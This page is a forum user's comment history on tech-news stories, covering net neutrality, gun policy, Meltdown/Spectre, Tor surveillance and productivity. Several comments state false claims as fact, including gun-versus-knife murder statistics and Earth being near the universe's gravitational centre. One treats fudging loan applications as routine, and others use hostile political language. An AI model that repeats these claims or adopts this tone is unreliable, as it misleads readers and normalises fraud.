* Posts by bombastic bob

5200 posts • joined 1 May 2015

IPv6 and 5G will make life hell for spooks and cops say Australia's spooks and cops

bombastic bob Silver badge
Coat

Re: Backdoors don't matter.....

I'll just stick with ROT-13 - it's secure enough for everyone!

bombastic bob Silver badge
Devil

Re: So they want..

"With ipv6 they can do a 1-to-1 mapping of IP address to device, which surely is much stronger from the point of view of bureden of proof."

not only that, but an IPv6 user is likely to have an assigned netblock, which "identifies" you. So, in actual fact, it's EASIER to tell who you are, because your netblock won't change.

As I recall, I've got two /64 blocks assigned to me. that leaves about 2**60 netblocks for everyone else, assuming that we're all assigned netblocks from 2000::/3

https://www.iana.org/assignments/ipv6-address-space/ipv6-address-space.xhtml

Why, why, Mr American Pai? FCC boss under increasing pressure in corporate favoritism row

bombastic bob Silver badge
Devil

maybe what's REALLY happening is...

maybe what's REALLY happening is that the regulatory environment over at the FCC is becoming LESS "favored" towards those who've benefited from such "favoritism" in the past, which just HAPPENS to benefit one particular company, who perhaps has been TOO REGULATED until now?

Just a thought. But it goes against a one-sided rant against Pai. You guys just don't like him because he shut down regulations at the FCC that would enforce "net neutrality", which is anything BUT what its name implies...

I say "net free-for-all" and just comply with the technical standards so the nodes can still talk to one another. you know, like what it was for >20 years before "net neutrality". It seemed to work pretty well BEFORE, so why did we need "all this regulation" shoved into our orifices?

Oh _I_ know why: to EMPOWER BUREAUCRATS so they *COULD* engage in various forms of favoritism! [and would THAT be so eagerly and well reported on if it were favoring OTHER than a large media company like Sinclair ???]

Just sayin'... (and the downvotes are badges of honor, thanks in advance)

Symantec ends cheap Norton offer to NRA members

bombastic bob Silver badge
Devil

"What do a gun manufacturer lobby and internet security have to do with each other?"

Nothing. But the NRA is more like a club or an organization, with membership (not a manufacturer lobby).

Apparently Symantec just wanted NRA members to have an introductory offer as a benefit for membership [maybe it was part of an advertising deal or something with the NRA]. You might see similar *kinds* of discounts for AARP members. Right?

In any case, Symantec probably angered too many potential customers by caving to the LEFTIST BULLIES like that. Yeah, empower and enable those FASCISTS who hate freedom by caving into their demands instead of telling the to GO TO HELL!

The 2nd ammendment is MOSTLY about the right to self defense. "Infringe" on THAT, and you get a population of easily controlled "sheeple", when it becomes ILLEGAL to kill someone in the defense of life/injury/property, someone who's trying to kill/rob/rape YOU. Or your family. Or your neighbor. And so on.

But as for ME, I'd rather use my BARE HANDS to defend myself. Heh. Heh. Heh.

bombastic bob Silver badge
Stop

Re: That'll show 'em!

"actually this kind of boycott/pressure is one of the only ways small consumers can impact the behaviour of large corporations."

actually, this kind of boycott/pressure is done by a HANDFUL OF PEOPLE who use bots to make 1 person look like 10,000, willing accomplice web sites like faecebook and twatter, and various bullying and intimidation techniques to (essentially) SILENCE! THE! OPPOSITION! even though THEIR opinion is in the minority.

it's how "the left" does what they do. It's been going on for DECADES, in one form or another. It's a classic 'Saul Alinksy' tactic, from paid protesters getting "special media attention" so that the 100 protesters look like thousands, yotta yotta yotta. This shouldn't surprise anyone.

And Symantec won't be getting MY business. (well, I don't really want their stuff anyway)

Rush Limbaugh has done a VERY good job of exposing some of these idiots, when they went after HIS advertisers on twitter a while back... using BOTS to make themselves look like a 'legion' when in fact, it was 10 people. Yes, he named names. wanna see?

https://www.rushlimbaugh.com/daily/2014/09/23/the_hidden_story_behind_stop_rush/

Imagine the libel suits (that did NOT happen) if he had been WRONG about this...

And THAT is the point: boycotts are BULLY TACTICS used by DESPERATE LEFTIES that can't win in the arena of ideas by stating their case to an intelligent audience. Instead, they must manipulate emotions, engage in "this kind" of behavior, make themselves look bigger than they really are, intimidate, protest, make a lot of noise, and generally be a PAIN in the rest of the world's ASS.

Does anybody REALLY wanna be CONTROLLED by THESE people? I sure don't!

Boycotts are the TACTIC of MANIPULATIVE HOODLUMS. I suggest NOT participating in them. And threatening people WITH boycotts is even WORSE. (and I don't have much respect for companies who cave to these idiots, either)

/me points out that if I found out Obaka likes (or hates) Starbucks coffee, it won't affect my opinion of them. I'd still go for a cappuccino on occasion, or purchase a bag of Espresso Roast beans...

Intellisense was off and developer learned you can't code in Canadian

bombastic bob Silver badge
Devil

"DELETE FROM HISTORY;"

oops!

2 lessons:

a) do backup first

b) use 'SELECT *' in place of 'DELETE' in a test query before changing it to 'DELETE'

bombastic bob Silver badge
Devil

Re: Archimedes

I've seen 'colour' and other things spelled that way in wxWidgets, as I recall...

bombastic bob Silver badge
Coat

Re: I've never quite understood

"As any fule know, 'colour' rhymes with 'yellow'."

/me ponders for a moment... 'old yellow' - now you're making me foam at the mouth!

heh - only kidding... or?

coat, please

bombastic bob Silver badge
Devil

#define IF(X) if(0)

#define ELSE if(0)

heh

(ok that doesn't work in Java but still...)

bombastic bob Silver badge
Devil

"'Queens English' - the language spoken in one of the boroughs of New York City."

And the current U.S. President! Heh.

bombastic bob Silver badge
Devil

Re: Boro

as a kid, for the longest time, I was confused by the spelling of 'bough' - always thought it was pronounced 'bow' like 'bow and arrow', and not 'bow' as in 'bow to show respect'. And in my mind it was never connected to the spelling for 'tree bough'. It may be the worst example of arcane non-phonetic spelling causing confusion. [but in middle english it probably rhymed with 'cough'].

bombastic bob Silver badge
Joke

backgrond-colour <-- fixed

bombastic bob Silver badge
Devil

perhaps he needed a "non-US-english.h" with a bunch of #define aliases in it

EU aviation agency publishes new drone framework. Hobbyists won't like it

bombastic bob Silver badge
Devil

Re: Drone makers rush

"Seems fairly reasonable to me."

as someone who apparently flies model aircraft AND people-driven aircraft, I think your opinion should carry a lot of weight.

After a cursory look at the article, I didn't see anything really bad, either. Local authorities being able to exempt flying clubs and specific locations is probably the BEST part, since it avoids the "top down dictatorial way" of handing down regulations, which rarely (if ever) really fixes a problem everywhere, equally.

And if you can't see the thing flying, it's not a bad idea for you to need some kind of 'pilot creds' to fly a drone outside of visual range.

The FAA could do something very similar and I'd be happy with it.

Apple: Er, yes. Your iCloud stuff is now on Google's servers, too

bombastic bob Silver badge
Trollface

Re: But...

"Beard trimmers and latte makers"

you don't need a beard trimmer THAT often - just when you need to make a public appearance. Like "when do you need to shower" or "when do you need to change clothes". [my underwear is itchy, time to change it - ha ha ha ha ha]

/me wonders if it's actually 'that way' inside the cubes at Apple. Heh.

Oh, and latte is too weak. Cappuccino or Espresso [or Jolt] and don't forget powering the mini-fridges.

bombastic bob Silver badge
Devil

Re: Bah!

Alanis Morissette? I don't get it...

(then again I don't like her "music", nor 'that whiny style' from the 90's in particular, so maybe that's why I don't get it)

But since Apple (apparently) isn't a cloud provider, they gotta use SOMEBODY's cloud server...

/me thinks that if you store your data [strongly] encrypted, such that ONLY YOU have the decrypt key, then it could be stored in a publically viewable place and STILL be secure.

[then it wouldn't matter who snoops or subpoena's your data, it will be worthless to them]

Or, just don't 'iCloud' anything. There's an invention called an SD card. you could store things on THAT, instead.

Trump buries H-1B visa applicants in paperwork

bombastic bob Silver badge
Devil

Re: Off shore slumming

well, we WANT it to be "hire local expertise at the going rate" rather than "import people to drive the cost down".

but yeah, unintended consequences being what they are, hard to say how it will work out unless we let it run for a while, see how it goes.

Just out of curiosity, how does UK handle _their_ equivalent of H1-B?

Unlucky Linux boxes trampled by NPM code update, patch zapped

bombastic bob Silver badge
FAIL

Re: One Consolation in this.

"But, if you have to write complex web frontend behavior"

then you're stuck with an idiotic/clueless design that should be scrapped for something that does bulk of the work server-side instead, and without JavaScript.

but yeah that would require more serious developers with *REAL* skills... instead of pretend "developers" who "program" using JavaScript (read: slap together several bloatware packages into a chimera-monster and call it 'programming').

Huawei guns for Apple with Mac-alike Matebook X

bombastic bob Silver badge
Devil

Re: When?

and can it come with OS/X [or another non-MS OS] in lieu of Win-10-nic ???

Because, if it has Win-10-nic, I ain't buying.

We all hate Word docs and PDFs, but have they ever led you to being hit with 32 indictments?

bombastic bob Silver badge
Devil

Re: There's a worrying implication

well, consider this:

a) you go to your bank because you NEED MONEY, because (for some reason) you didn't earn enough and there are expenses

b) The bank checks your CURRENT income and says "no we cannot lend you money because you actually NEED it right now"

Now, the bank WANTS to lend you money, because you make THEM money when you pay it back. So what happens normally? Well, they make a decision based on you, your history, how much of your money has flowed through their bank, what your credit rating is, and so on. THEN they give you an approval based on "all of that", sometimes coaching you to 'fudge a little' so they can "sell you the loan".

This is just business as usual, in reality. The banks want you to pay them because they'll lose money if you don't. But sometimes stupid-regs just "get in the way" and so the loan officers know how to 'adjust' things accordingly to make it work. And it does. And we move forward, pay our bills [most of the time], and everybody's happy, and nobody outside of the bank and customer REALLY NEEDS TO KNOW the details of that process.

Added: business loans and lines of credit are a bit different than mortgages...

Why isn't digital fixing the productivity puzzle?

bombastic bob Silver badge
Devil

"Employment is falling"

you meant UNemployment is falling, right? Fixed.

bombastic bob Silver badge
Pint

Re: Millenials

"Smartphone / social media obsession cannot be helping output per worker as the opportunity for distractions increases."

A *BRILLIANT* point! beer?

[I might add, the (apparently 'millenial') trending use of online and cloudy 'things' which, from what I can tell, aren't quite as good as the ones they were patterned after, seems to be a part of it. And, if you view the world through a 4-inch screen (like many millenials seem to do), you get a very NARROW perspective of it, in particular, one that's _marketed_ to you, so that you don't easily see anything else...]

bombastic bob Silver badge
Thumb Down

Re: If people don't get paid enough money...

1% this, 1% that...

you're STILL doing that 'Occupy' crap? That's SO lame...

'Scuse me, your "envy politics" is showing.

bombastic bob Silver badge
Devil

Re: Well, there's your problem!

"If all you do is manage a team of coders then you need to earn less than those coders."

hold on there, that's a bad generalization to make [though I'm sure there are a lot of UNproductive 'managers' out there].

Management done properly makes it look as though the manager isn't doing anything at all.

It's the manager's job to divvy up the work assignments so that things get done. It's the manager's job to make sure that interactions happen in a SANE way. If that means "Scrum meeting" then it's probably being done WRONG. if it means individual 1-on-1 meetings (as simple as "how are things going") followed up by some kind of a policy decision, then it's probably being done right. If your problems with 'management' are being dealt with [or there aren't any] it's being done right. if you're constantly getting jerked around and following whatever Sales wants done, it's probably being done wrong.

I would think that departmental productivity should be the #1 factor in determining how much a manager is paid. And SOME managers might be worth 10 times the wage of the average developer, just on the fact that developers become so much more productive when "that guy" is running the show.

So YMMV on management salary. But yeah, a proper measuring device is in order.

bombastic bob Silver badge
Pint

"the productive parts of the economy are now so wrapped in red tape and security theater that they have stopped expanding"

A *VERY* good way of saying it! Beer, sir!

bombastic bob Silver badge
Thumb Down

Re: Our missing productivity was shifted to China

"the old capitalism is the only way that works argument"

"relies heavilly on defning "all" to exclude the brown people" (etc.)

"Is that the system you are promoting?"

thanks for tossing in the 'emotion bomb' of racism into an otherwise sane discussion, like a Hand Grenade.

I officially downvote the HELL out of your comment, on that basis.

bombastic bob Silver badge
Devil

Re: It doesn't take a flashy report with pretty graphs...

"people making minimum wage put in minimum wage effort." "You get what you pay for"

This is converging closer to reality, now.

You can make economic criticism from both the right and left, talk about effective take-home wage vs what you're actually paid (in which case, tax cuts are an obvious stimulus to the economy from a 'consumption' point of view), or the 'widening gap between rich and poor' in which case there's apparent exploitation going on [as has happened in the past, ca "robber baron" era].

But each of these is an inadequate explanation on its own, as they're interrelated. When the employees don't have enough $ to live on comfortably, it screws with their psyche, and when this causes a perception of "have vs have not" envy, making things worse. [keep in mind that high tax rates on 'the rich' are actually on upper middle class WAGE EARNERS, and tend to WIDEN that gap, because it keeps upper middle class from BECOMING 'the rich' - prior to last December, 'the rich' were getting away with paying LOWER taxes because the income wasn't WAGE income - but I digress].

Here are some of the negative aspects that create productivity problems, in my view:

1. Hiring the wrong person. This is ALWAYS expensive. There are many reasons why, from race/sex/whatever quotas [gummint mandates and lawsuits] to HR incompetence. "What Color is your Parachute" talks about this, from what I recall.

2. Actual collusion to pay people less - this happened in Silly Valley a while back.

3. Inefficient management - too many meetings, for example, or focus on "social" instead of "work output". You can 'feel good' about it all damn day and NOT get a damn thing done! This isn't helping anybody.

4. Punishing achievement and rewarding mediocrity. This is a complex issue, because it happens in the tax code [work more/harder, less effective $ per hour], and seeing promotions based on something OTHER than merit (like race/sex/whatever quotas). Productivity and quality must be rewarded, or else you get "who gives a flying FEEL any more" with dead-end jobs and looking to go elsewhere all the time.

5. "Process of the week" involving the latest new, shiny way to do engineering work, like "Agile" done wrong by everyone that attempts it. Scrum meetings in which "the junior guy" gets an equal say, for example, and management going along with it because it FEELS good to let 'the newbie' get a chance to contribute.

Anyway, that's my $.10 on it. You basically can't point at a single thing, but when you look at ALL of it, there could be a pattern...

Does my boom look big in this? New universe measurements bewilder boffins

bombastic bob Silver badge
Black Helicopters

Re: 2011 Nobel Prize (Reiss, Perlmutter, and Schmidt)

" It's the Russians. They get everywhere these days."

you haven't heard the newest conspiracy then: It's really the Chinese government _PRETENDING_ to be Russians... with help from the NSA, so they can later blame the North Koreans.

bombastic bob Silver badge
Mushroom

Re: Possibly.

distance from gravitational center of the universe as "a factor" - how's that?

as I understand it, we're pretty close to that gravitational center (which should be the place the big bang happened). At least, that's what it looks like from our perspective.

/me wonders if the big bang made a mushroom cloud... thus, icon choice [ok it didn't because 'ground' and 'gravity' are needed to make a proper mushroom cloud, but it's still lame-funny]

bombastic bob Silver badge
Trollface

Re: Or in this case

"(see new paper to be released around April)"

I can't wait to read it!

You know, like RFC8140 and its predecessors.

bombastic bob Silver badge
Devil

Re: The edge is nothing more than a ripple in the pond

"taking two days to travel from Los Angeles, CA to San Antonio, TX"

Highway 8 through "the Zone" (Arizona) is wide open and empty space. Lots of it.

Doesn't part of that trip go through Mexico? But you're British and you already had your passports [it's just that rental car companies don't really like it when you do that, you have to get Mexican car insurance at the border, yotta yotta]. Anyway there's a way around but it takes WAY longer.

bombastic bob Silver badge
Meh

Re: You will never know the horrible truth about dark oil, err... dark matter!

"Post Brexit they need a new variable yurrupean one."

yeah what WAS it with all the science-re-namey things. The first time I heard 'Sieverts' I was all "what the hell?" and then I googled and found out that someone changed the name AND 1 Sv became 100 REM which is like "thanks a LOT for making me do more math in my head".

New 'SI' units meant "we were not very busy at that moment, so we did some make-work and appeared like we were doing something important for a while".

So why NOT come up with something more 'European' than 'Hubble Constant'? You can't have British or American scientist names in things any more, after all...

https://en.wikipedia.org/wiki/Edwin_Hubble

Let's call it "Lemaître's constant" from now on, then. He's a Belgian [that's EU enough, right?]

bombastic bob Silver badge
Devil

Re: Breath in, breath out

and we also assume that TIME is constant and/or follows our current predictions of relativity, and that light isn't somehow "lensing" due to the combined gravity of everything in the universe. If light traveled kind of "curvish" towards us (due to combined gravitational effects, let's say), we'd see distances as being farther than they actually are, through parallax and other means. And the farther away, the more curving you'd get, and really distant objects are hard enough to measure correctly, so is a 9% error THAT unexpected?

Need a better ruler, that's all.

/me imagines the sky through a sort of fish-eye lense, where the position of really distant luminous objects is slightly distorted from gravitational effects. that might do it, yeah. In that case, radio telescopes with finely tuned measurements _might_ be able to detect this.

bombastic bob Silver badge
Devil

Re: Dark matter/energy.

'dark energy' may simply be trying to explain something that's a bit more elegant, sort of like the way geocentrists tried to explain planetary motion. In their model, each planet revolved on an invisible disk around a center point, and the center point revolved about the earth. it worked in mechanical representations, since each of the 'disks' was basically earth's orbit. And it "explained" motion by predicting planetary positions mechanically. but it was WAY wrong.

One model I've seen may coincide with the observations a bit better. it would mean the universe is a bit smaller, though [or maybe way bigger?]. it's a non-linear way of looking at light propogation. The thought is that light travels "faster" over a distance. In under a few light years, the actual time it takes for light to travel from star to observer is roughly the same as the distance in, well, light years. But according to THIS model, vast distances travel FASTER because light is traveling in curved space. So in that model, the light seems to 'accelerate'. It explains a lot of the red shifting [not all of it] and the apparent acceleration of the expansion of the universe. It's also 'cool' in that something nonlinear is happening.

Anyway, just thought I'd throw that out there. I forget where I read about this, I just remember reading it back in the 80's or 90's. Is it true? Idunno. Is it a rectally extrapolated attempt to prove the universe isn't created by the big bang? That's a distinct possibility [it seems to have been a somewhat liked idea amongst the creationists to counter 'big bang', though I doubt it proves a 6,000 year old earth]. But the idea that light does not travel "linearly" through space has other implications that might revolutionize physics, if it's actually true...

(and we COULD be staring at the proof, right now!)

NRA gives FCC boss Ajit Pai a gun as reward for killing net neutrality. Yeah, an actual gun

bombastic bob Silver badge
Megaphone

Re: We have the clueless leading the blind...

" it now appeared 4 trained law enforcement officers did not feel able to rake on a shooter with an AR15 rifle. Quite how a teacher with a concealed carry handgun is expected to do more bemuses me."

__I__ would have done it, WITHOUT hesitation, if for no other reason, for the LULZ. "A shooter - IT'S MY CHANCE!!!"

And, your (condescending?) attitude towards teachers disturbs me.

A teacher who is former military, or who may even be a volunteer cop or deputy, and has gone through police and/or military firearms training, would be MORE than capable. And a teacher with some NRA training would be ok, too. Keep in mind, NOT EVERYONE is a simpering COWARD. A number of us are into martial arts, and wouldn't hesitate to defend ourselves or another human being from an EVIL PERPETRATOR. And consider how one of the PE coaches acted as a HUMAN SHIELD (apparently tossing students through open doorways, etc.) and died a hero, saving the lives of as many students as he could. If he'd had a PISTOL, I bet he would have SHOT THE PERP! And, THAT is what _I_ am talking about! It's the kind of bravery that stops a criminal from causing a MASSACRE.

Those 4 cops you mentioned should be *FIRED*. One of them quit on his own.

I think nothing would make me happier, if I had a concealed carry permit, than being able to USE MY WEAPON to defend against something like that. "This is what I've TRAINED for, PRACTICED for, endured the rectal exam to get my concealed-carry permit for! MY CHANCE! W00T!"

And there are enough people like ME in the USA that there's no shortage of volunteers who would say the same *KINDS* of things, and actually *MEAN* it.

(and yes, I'm ex-military, and I know how to shoot).

Now consider this: if schools weren't labeled as "gun free zones", would the school shooter STILL have tried this? because, if it's "gun free" then ONLY a criminal will have one...

bombastic bob Silver badge
Megaphone

Re: We have the clueless leading the blind...

"A few are accidents, some are suicides, the vast majority are murders"

not true. the vast majority are SUICIDES:

https://www.nytimes.com/2015/10/09/upshot/gun-deaths-are-mostly-suicides.html

"More than 60 percent of people in this country who die from guns die by suicide"

And that is the NY Times, and not Fox News, though Hannity has been talking about this kind of thing all week.

FYI - it's my understanding that murder statistics with KNIVES are several times that of guns (3 or 4 times I think), and even MORE murders are with BARE HANDS! (or feet, part of the same statistic).

So... anti-gun people, get your FACTS STRAIGHT before you go off on your emotion-filled manipulative tirade against SELF-DEFENSE, simply because YOU have issues with guns in the hands of LAW ABIDING CITIZENS for the purpose of DEFENDING THEMSELVES. You can't have a cop everywhere to protect everyone against "the bad guys". And even if you do, SOME of those cops may even cower behind cover until the bullets stop flying! (this REALLY happened a week ago, a sherrif's deputy hid for 4 of the 6 minutes' worth of shooting, instead of putting his life on the line to save at least SOME of the students that were shot by the (allegedly) psychopathic school shooter - firing in the air would've at least distracted the perpetrator and caused him to focus on YOU instead, or maybe hide, or whatever, ANYTHING to disrupt his 'fish in a barrel' shooting spree)

In any case, if you want PROTECTION, it's gotta by SELF protection! You can't trust law enforcement, they can't be everywhere, and if you can protect YOURSELF, you're better off.

bombastic bob Silver badge
Unhappy

Re: We have the clueless leading the blind...

"There is no doubt that Ajit Pai is clueless on net neutrality and wrong to have killed it."

I have _LOTS_ of doubt, about that statement in particular. Ajit Pai de-regulated by killing off something that the FCC shouldn't have been trying to regulate in the FIRST place.

And stop calling those regulations "net neutrality" please. It's such a "wrong descriptive" name. 'Net Neutrality' makes it SOUND like it protects people. The truth is, it restricts what services you can get, by ensuring that EVERYBODY is EQUALLY "mediocre", and NOBODY can pay extra for a 'fast lane'.

That's right. We'll all just FLY COACH. On 'Spirit Air'. No more 1st class, no more business class, just "cram 'em all into a can" coach. This analogy is similar to how so-called "net neutrality" is implemented.

Tor pedo's torpedo torpedoed: FBI spyware crossed the line but was in good faith, say judges

bombastic bob Silver badge
Devil

Re: Then what is the point of Tor?

well, it's difficult to trace your real IP address via Tor. Lots of strategies exist, like monitoring 'exit points' and whatnot, but the best one (probably) is to effectively load some kind of malware onto the client's computer using some known flaw in his Tor browser, or flash [another reason NOT to use flash].

Malicious javascript executing in the browser might be able to get information onto a server of choice, via a simple 'GET' request using an alphabet-soup URL that embeds your information in it, that retrieves a graphic that looks benign [or is even a 'classic' 1x1 transparent GIF like the ones sometimes used by ad trackers].

Then the 'alphabet soup' URL is simply logged, and after reviewing the logs, then "they" _KNOW_ it's YOU.

bombastic bob Silver badge
Devil

Re: My sympathy meter is broken

"They have the legal right to hack into any computer they want, anywhere in the world."

Only under U.S. law would it be "legal". In theory, if one of them ever showed up in another country where such alleged hacking took place, the FBI guy responsible for the hacking could STILL be arrested for it, "over there".

And the country where the server hack took place could STILL file for extradition, etc. if they wanted to.

Yeah, like it would ever happen...

OpenBSD releases Meltdown patch

bombastic bob Silver badge
Devil

Re: Nitpick

really? well I'm actually looking forward to the FBSD fix.

bombastic bob Silver badge
Boffin

Re: Still concerning ...

"Meltdown is not a processor microcode issue"

that may not actually be true. In the case of meltdown, it's a serious design flaw in which a memory access is being done during 'out of order' execution, that bypasses normal tests. "At some point" the page fault or protection fault will occur, but not until AFTER the memory location was actually read in.

The problem here might be fixable with microcode if the microcode can be modified to avoid actually reading any memory location until after all "leading up to it" read operations have been access checked.

As I understand it, Meltdown crafts code to execute 'out of order' by first reading a kernel memory location into a register, and then uses that value as an index into an array. The 'out of order execution' model ends up calculating the correct memory offset (even though there should have been an access violation) and then 'hits' the memory location within the array [and you use the side-channel technique of measuring which block of your array is now 'cached' after that]. A page fault or some kind of access violation occurs too long AFTER the kernel memory was accessed, and (specifically) NOT before reading the memory location within the array indexed by the kernel memory location's byte value, which is what makes this attack possible. [the array would be specifically designed for this and deliberately flushed from all caches before doing this, one byte at a time].

Fixing this would involve determining that the initial access into kernel space was not valid, and thereby STOP the rest of the 'out of order / hyperthreading execution' stuff from happening. This assumes it's microcode, and not flawed silicon causing this. It also explains why Intel is vulnerable, and not AMD, because [apparently] the AMD people figured out that this was a BAD thing beforehand.

And then I have to wonder if there's a slight performance hit by doing this in the silicon or in the microcode, therefore implying that Intel 'cheated' by allowing the flaw to be there to ge a slight boost in speed over AMD. This last part is pure speculation of course. It could have been accidental, too.

So yeah, MAYBE Meltdown can be patched in microcode. Unless you've heard different from Intel... ?

Intel didn't tell CERTS, govs, about Meltdown and Spectre because they couldn't help fix it

bombastic bob Silver badge
Devil

Re: Specter / Meltdown were not mistakes...

"These security holes are a direct result of using caching and speculative execution together"

an interesting point. So a mitigation MIGHT be to NOT physically access anything that isn't in the L0 cache during speculative execution? And, of course, to NOT physically access any memory address for which memory flags would cause a protection fault or page fault [aka 'Meltdown']

Doing these things in microcode would END the vulnerabilities as I understand them, with only a limited effect on execution speed.

To mitigate those changes, a serious increase in L0 cache size would also help.

compilers might need also need updating to help minimize the number of RAM pages that a "tight little loop" would need in order to function efficiently with out-of-order and speculative execution.

and that 'ret-poline' mitigation COULD become an option, for people who want to do that.

thinking of that last part, I've used 'ret-poline' techniques before. It's the easiest way to jump to a 'long' address on an ATXMega processor (and probably an ATMega also, specifically the ones with >64k of NVRAM). The alternative actually takes more assembly instructions. So you push 3 bytes and do a 'ret' instead. Yeah, Arduinos and microcontrollers. But not a new idea for a "ret-poline".

bombastic bob Silver badge
Black Helicopters

Re: Specter / Meltdown were not mistakes...

"I don't think they'd bother when they've got the management engine"

ack

Seriously, though, there should be a jumper for enabling or disabling the 'management engine' or its equivalent - ONLY allow it when the jumper is set to allow it, so it can be disabled electrically. even a BIOS setting to disable it could theoretically be circumvented.

home users don't need this. Only large organizations that have an IT department with tools that can leverage 'management engine' MIGHT actually need it. But the NSA _can_ use it. That's the problem.

And I doubt Meltdown/Spectre would be something the NSA would want anyway. side channel attacks are too inefficient.

bombastic bob Silver badge
Devil

Re: Nobody has yet

"Explained the benefit of revealing the fault as soon as it was discovered."

Here's the alternate universe timeline that I think should have happened:

1. Intel and AMD announce that they have discovered some flaws in their CPU design that could lead to "side channel' attacks, something that is difficult to anticipate, and NOT disclose the details.

2. Intel and AMD work out fixes for this problem, and share 'mitigations' with all operating system vendors.

3. Intel and AMD release new CPUs that are designed NOT to have these flaws, and provide well tested working microcode for older systems.

4. After all of the fixes are in place, the details are released so people understand what happened.

This would result in Intel and AMD looking VERY good. Initially they get a small hit, but being THAT HONEST about the cock-up will eventually turn around to help them. And NOT disclosing the details helps prevent 0-days from emerging.

The thing about Meltdown and Spectre is that it's not intuitively obvious since they're side-channel attacks [for the most part]. So exploiting them without a really good explanation of what the flaw is would be "hard to guess", a sort of 'security by obscurity' that can last long enough to patch it.

So if Intel and AMD had simply bitten the bullet and and admitted the existence of the flaw the moment it was discovered, they MIGHT have INCREASED THEIR SALES overall as a direct result, as people replace old hardware [which was previously considered 'good enough'] to avoid any slowdowns or potential un-patched vulnerabilities.

In any case, this "alternate universe" scenario didn't happen. That made the original cock-up WORSE.

bombastic bob Silver badge
Unhappy

Re: Note that they didn't bother with open source operating systems

Well, according to the article, the 'insiders' comprised "Google, AMD, Arm, Apple, Amazon and Microsoft."

Apple has at least SOME connection with FreeBSD, but there's no motive to let any of the BSD engineers know about something in the KERNEL.

And, there MAY be a 'profit motive' in which "ONLY THEY" have fixes available, so if you don't want a vulnerable system, you "go to them" [specifically Micro-shaft and Apple].

Had IBM been involved, I think we'd have seen more efforts in Linux, and being open source, it would 'trickle' into the BSD's pretty quickly.

The better path is to be as open about this problem as possible. "We F'd up" is a better path than scrambling for the hills and covering your tracks.

Google reveals Edge bug that Microsoft has had trouble fixing

bombastic bob Silver badge
Unhappy

Re: One should note, that it was Microsoft who wrote this bug

"How much did you pay for your copy of Edge? How much did you pay MS to patch it?"

indirect payment: you have to run Win-10-nic to be able to run Edge.

You have to endure the slurp, tracking, and ads jammed up your as down your throat, "the Metro" [because We know better how You need to use your computer], and FORCED UPDATES [even if they brick, it's better than NOT accepting the "new, shiny", getting your custom settings reset periodically, and wasting INFINITE BANDWIDTH and YOUR time waiting for infinite updates to load, install, and potentially BRICK *your* computer]. THAT is "payment" (more than) *ENOUGH*.

US state legal supremos show lots of love for proposed CLOUD Act (a law to snoop on citizens' info stored abroad)

bombastic bob Silver badge
Black Helicopters

Re: Don't give in to the unethical and immoral imperial power, the United States

I think you should've used the 'black helicopter' icon.

I have a suggestion: do not store anything in the cloud, and make sure you are well aware that anything that ends up on "teh intarwebs" can be snooped, snarfed, collected, "meta-data'd", and potentially submitted as evidence, regardless of where in the world it's stored, and hopefully NOT by criminals [though it's more likely to be the case].

icon, because, should've been there already.

bombastic bob Silver badge
Meh

Re: America Fuck Yeah

"what will do then US Govt?"

hopefully, REAL police work. Not lazy 'metadata' searches, but the kind that can take a while and usually involves irrefutable evidence collected legally without violating the rights of U.S. citizens [or any international agreements with respect to non-citizens]. THAT is the way it is SUPPOSED to be done.

but yeah, it sounds like the cops are lazy, doesn't it?

"You're a failed state America, face it"

No, not until the point where "they" get their way while the sheeple watch (or fail to watch) without interest. That's really not happening, at least not yet. [what concerns ME is when 'due process' is perverted for the same kinds of reasons, and it seems THAT HAPPENED somewhat recently, from top levels of the FBI, via the FISA court].

bombastic bob Silver badge
Happy

Re: Wow.... just... wow!

"How do you say 'Fuck Off' in American?"

You just did. heh.

bombastic bob Silver badge
Devil

Re: Wow.... just... wow!

"How long would a person spend in jail before law enforcement was satisfied you are correct"

There are limits on how long you can be held for contempt of court (though it may not be apparent). if you are held without bail (and that requires a hearing before a judge to have that happen) then you can be held until you get a not guilty verdict. but that's not likely with a contempt hearing first.

The length of time for being held for contempt would vary based on the jurisdiction. However, it's theoretically possible it could be "forever" if you keep being in contempt.

An example:

https://www.wsj.com/articles/SB123137263059962659

The jail stops the moment you submit to the court's authority. It would take some pretty large gonads to stay in jail for YEARS like that, based entirely on principle.

It's what can happen in a society that's ruled by law. I guess you could ask a similar question in the UK, how long will it take before Julian Assange can 'walk free' in the streets of London? Exactly.

Biting the hand that feeds IT © 1998–2019